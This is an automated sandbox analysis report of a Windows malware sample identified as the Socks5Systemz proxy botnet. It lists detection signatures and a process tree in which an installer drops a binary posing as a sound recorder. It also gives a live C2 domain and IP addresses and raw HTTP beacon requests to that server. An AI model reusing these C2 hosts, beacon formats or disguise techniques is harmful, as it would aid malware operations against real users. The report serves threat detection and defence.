Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tOniaJ21lj.exe

Overview

General Information

Sample name:tOniaJ21lj.exe
renamed because original name is a hash value
Original sample name:fa367a7d44377d2c3f684c3912fec827.exe
Analysis ID:1455403
MD5:fa367a7d44377d2c3f684c3912fec827
SHA1:cb9e24a00431a7cccecf333b5d4ec34785389191
SHA256:7256e9f673b78c62aae25f78902c393d758262202e8ab4e4b4f1d5d01cd4cd12
Tags:exeSocks5Systemz
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • tOniaJ21lj.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\tOniaJ21lj.exe" MD5: FA367A7D44377D2C3F684C3912FEC827)
    • tOniaJ21lj.tmp (PID: 2836 cmdline: "C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp" /SL5="$10474,4719378,54272,C:\Users\user\Desktop\tOniaJ21lj.exe" MD5: 8EF7001015E126E74BC41268504CA1E2)
      • recordpadsoundrecorder32.exe (PID: 4368 cmdline: "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -i MD5: 1F7ED6F21708581170C4BF77C64A9D32)
      • recordpadsoundrecorder32.exe (PID: 1412 cmdline: "C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe" -s MD5: 1F7ED6F21708581170C4BF77C64A9D32)
  • svchost.exe (PID: 5356 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["aaxeeeo.ru"]}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-OIVVM.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.2036104577.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000003.00000000.2033651879.0000000000401000.00000020.00000001.01000000.00000008.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000004.00000002.3269669582.000000000097E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: recordpadsoundrecorder32.exe PID: 1412JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  3.0.recordpadsoundrecorder32.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    4.0.recordpadsoundrecorder32.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                      Sigma Signatures

                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5356, ProcessName: svchost.exe

                      Snort Signatures

                      Timestamp:06/11/24-19:43:31.633412
                      SID:2049467
                      Source Port:52643
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:57.171208
                      SID:2049467
                      Source Port:52623
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:26.414769
                      SID:2049467
                      Source Port:52640
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:49.420215
                      SID:2049467
                      Source Port:52655
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:40.013828
                      SID:2049467
                      Source Port:52649
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:07.601992
                      SID:2049467
                      Source Port:52629
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:53.737196
                      SID:2049467
                      Source Port:52658
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:01.749476
                      SID:2049467
                      Source Port:52626
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:10.177838
                      SID:2049467
                      Source Port:52631
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:16.249164
                      SID:2049467
                      Source Port:52635
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:44:00.280298
                      SID:2049467
                      Source Port:52663
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:06.376941
                      SID:2049467
                      Source Port:52628
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:00.233904
                      SID:2049467
                      Source Port:52625
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:27.013923
                      SID:2049467
                      Source Port:52641
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:52.482822
                      SID:2049467
                      Source Port:52657
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:11.744384
                      SID:2049467
                      Source Port:52632
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:15.633502
                      SID:2049467
                      Source Port:52634
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:36.034207
                      SID:2049467
                      Source Port:52646
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:45.320897
                      SID:2049467
                      Source Port:52652
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:57.593794
                      SID:2049467
                      Source Port:52661
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:18.748451
                      SID:2049467
                      Source Port:52637
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:08.901351
                      SID:2049467
                      Source Port:52630
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:13.030652
                      SID:2049467
                      Source Port:52633
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:58.873534
                      SID:2049467
                      Source Port:52662
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:55.670104
                      SID:2049467
                      Source Port:52621
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:17.515047
                      SID:2049467
                      Source Port:52636
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:34.748394
                      SID:2049467
                      Source Port:52645
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:38.697972
                      SID:2049467
                      Source Port:52648
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:41.371967
                      SID:2049467
                      Source Port:52650
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:47.586566
                      SID:2049467
                      Source Port:52653
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:23.899062
                      SID:2049467
                      Source Port:52639
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:48.123287
                      SID:2049467
                      Source Port:52654
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:34.149022
                      SID:2049467
                      Source Port:52644
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:20.092414
                      SID:2049467
                      Source Port:52638
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:37.280010
                      SID:2049467
                      Source Port:52647
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:56.313009
                      SID:2049467
                      Source Port:52660
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:42.763270
                      SID:2049467
                      Source Port:52651
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:05.666289
                      SID:2049467
                      Source Port:52627
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:50.748248
                      SID:2049467
                      Source Port:52656
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:55.016662
                      SID:2049467
                      Source Port:52659
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:43:29.603330
                      SID:2049467
                      Source Port:52642
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:54.899608
                      SID:2049467
                      Source Port:52618
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-19:42:58.732763
                      SID:2049467
                      Source Port:52624
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: tOniaJ21lj.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpAvira: detection malicious, Label: ADWARE/AVI.ICLoader.jwrbl
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeAvira: detection malicious, Label: HEUR/AGEN.1314993
                      Found malware configuration
                      Source: recordpadsoundrecorder32.exe.1412.4.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["aaxeeeo.ru"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\libeay32.dll (copy)ReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeReversingLabs: Detection: 42%
                      Multi AV Scanner detection for submitted file
                      Source: tOniaJ21lj.exeReversingLabs: Detection: 21%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\is-UCHQL.tmpJoe Sandbox ML: detected
                      Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B864 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045B864
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B918 ArcFourCrypt,1_2_0045B918
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045B930 ArcFourCrypt,1_2_0045B930
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130
                      Source: is-UTKLG.tmp.1.drBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_195b4133-0

                      Compliance

                      barindex
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 3.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeUnpacked PE file: 4.2.recordpadsoundrecorder32.exe.400000.0.unpack
                      Source: tOniaJ21lj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: Binary string: msvcp120.amd64.pdb source: is-FR4FM.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: is-K3HBS.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb++ source: is-8ECK7.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb.. source: is-RV2D1.tmp.1.dr
                      Source: Binary string: msvcr120.amd64.pdb source: is-C4R5U.tmp.1.dr
                      Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: is-EAHN0.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtwinextras\lib\Qt5WinExtras.pdb source: is-RV2D1.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Xml.pdb source: is-KI2RB.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\openh264-2.0.0_x64\openh264.pdb source: is-PRP4U.tmp.1.dr
                      Source: Binary string: C:\msys64\home\--\src\ffmpeg\libavdevice\avdevice-58.pdb## source: is-JNDNQ.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb** source: is-KU10K.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5OpenGL.pdb33 source: is-0C056.tmp.1.dr
                      Source: Binary string: C:\Users\qt\work\qt\qtsvg\lib\Qt5Svg.pdb source: is-KU10K.tmp.1.dr
                      Source: Binary string: D:\Work\_\QtAV\QtAV-Desktop_Qt_5_15_1_MSVC2019_64bit\lib_win_x86_64\QtAVWidgets1.pdb source: is-8ECK7.tmp.1.dr
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047A964 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A964
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00470C84 FindFirstFileA,FindNextFileA,FindClose,1_2_00470C84
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00451668 FindFirstFileA,GetLastError,1_2_00451668
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460594 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460594
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00492760 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00492760
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0047884C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047884C
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_00460A10 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460A10
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpCode function: 1_2_0045F008 FindFirstFileA,FindNextFileA,FindClose,1_2_0045F008
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmpFile opened: C:\Users\user\AppDataJump to behavior

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52618 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52621 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52623 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52624 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52625 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52626 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52627 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52628 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52629 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52630 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52631 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52632 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52633 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52634 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52635 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52636 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52637 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52638 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52639 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52640 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52641 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52642 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52643 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52644 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52645 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52646 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52647 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52648 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52649 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52650 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52651 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52652 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52653 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52654 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52655 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52656 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52657 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52658 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52659 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52660 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52661 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52662 -> 94.156.8.14:80
                      Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:52663 -> 94.156.8.14:80
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: aaxeeeo.ru
                      Source: global trafficTCP traffic: 192.168.2.5:52619 -> 194.59.31.219:2023
                      Source: Joe Sandbox ViewIP Address: 94.156.8.14 94.156.8.14
                      Source: Joe Sandbox ViewIP Address: 194.59.31.219 194.59.31.219
                      Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
